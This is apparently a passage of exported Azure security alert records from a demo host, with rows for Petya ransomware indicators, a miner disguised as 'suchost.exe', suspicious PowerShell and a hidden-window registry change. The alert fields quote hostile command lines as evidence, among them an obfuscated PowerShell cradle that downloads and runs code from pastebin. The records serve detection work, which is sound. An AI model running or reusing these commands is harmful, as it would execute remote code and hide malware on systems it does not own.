""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17b0"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=OltXpcVnjJn0Eb7%2F5og32xlx%2FFjeRO7%2FD%2FWRXRKwhi0%3D&spr=https&st=2019-01-14T23:39:50Z&se=2019-04-14T23:54:50Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17b0"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:17.863405Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:17.863405Z"",
""EndTimeUtc"": ""2019-01-15T09:15:17.863405Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
63,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:17,2019-01-15 09:15:17,e647375c-9979-47b5-9f78-f414a1aad26d,2518547570821871899_e647375c-9979-47b5-9f78-f414a1aad26d,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17dc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=pbso6xXF6nk7cwihw20Kh77IZl0%2BrxBRrf%2FxX8l7tdU%3D&spr=https&st=2019-01-14T19:39:23Z&se=2019-04-14T19:54:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17dc"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:17.81281Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:17.81281Z"",
""EndTimeUtc"": ""2019-01-15T09:15:17.81281Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
64,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:10,2019-01-15 09:15:10,4ea6c432-6d20-4986-9679-ecf58ac4854d,2518547570895430544_4ea6c432-6d20-4986-9679-ecf58ac4854d,Detection,Microsoft,Suspiciously named process detected,Suspiciously named process detected,Suspiciously named process detected,Analysis of host data on MSTICALERTSWIN1 detected a process whose name is very similar to but different from a very commonly run process (svchost). While this process could be benign attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.,High,False,"{
""Account Session Id"": ""0x13bded7"",
""Compromised Host"": ""MSTICALERTSWIN1"",
""Parent Process"": ""cmd.exe"",
""Process Id"": ""0x1704"",
""Similar To Process Name"": ""svchost"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Process Name"": ""suchost.exe"",
""User Name"": ""MSTICAlertsWin1\\MSTICAdmin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
},
{
""$id"": ""3"",
""Name"": ""msticadmin"",
""NTDomain"": ""msticalertswin1"",
""Host"": {
""$ref"": ""2""
},
""IsDomainJoined"": false,
""Type"": ""account""
},
{
""$id"": ""4"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""EndTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""2""
},
""Account"": {
""$ref"": ""3""
}
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ImageFile"": {
""$ref"": ""5""
},
""Account"": {
""$ref"": ""3""
},
""Host"": {
""$ref"": ""2""
},
""Type"": ""process""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
65,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:12,2019-01-15 09:15:12,ce7c7361-8ac9-47be-b8fb-7a87c87ee178,2518547570876432155_ce7c7361-8ac9-47be-b8fb-7a87c87ee178,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xa60"",
""Suspicious Script"": "".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'Em17','pqCw')));}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xa60"",
""CommandLine"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:12.3567844Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:12.3567844Z"",
""EndTimeUtc"": ""2019-01-15T09:15:12.3567844Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
66,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,2df8ae94-03fe-4b9f-a3a9-f3c6dab95c05,2518547570833725387_2df8ae94-03fe-4b9f-a3a9-f3c6dab95c05,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\asc_alerttest_662jfi039n.exe"",
""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xc18"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xc18"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.6274612Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.6274612Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.6274612Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
67,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,1b074412-133c-4ac9-8e3f-24103159b03e,2518547570866947129_1b074412-133c-4ac9-8e3f-24103159b03e,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00, corresponding to X-axis=0c00 and the Y-axis=0c00) this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect Hex value includes, but not limited to c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x13a8"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x13a8"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.305287Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.305287Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.305287Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
68,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 06:31:40,2019-01-15 06:31:40,0402d10c-7489-482f-9e8a-bfa36d167d18,b34d24c9-2223-4887-af93-7598abf28763,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25011"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1703"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 25011
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25011
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 9143
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 819
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 498
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 06:41:46,,,
69,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 06:31:42,2019-01-15 06:31:42,1b71748c-de74-4d90-a41a-d474de2b1d17,9442245d-eaf6-47c5-b715-1c16b2c54fc4,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25010"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1703"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 25010
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25010
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 9143
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 819
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 498
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 06:41:55,,,
70,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 06:33:55,2019-01-15 06:33:55,ca8fd86e-af6f-4420-8aee-8470c5c2d2ff,edc4065d-886f-4aff-b17d-f1397ce4baec,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""24998"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 06:44:00,,,
71,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 21:18:10,2019-01-14 22:18:10,5eb2c501-77cc-4026-8a51-1f5b4ea99d63,1cca38a9-e0c5-4165-a78d-491ca2641c1c,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-14T22%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 22:28:13,,,
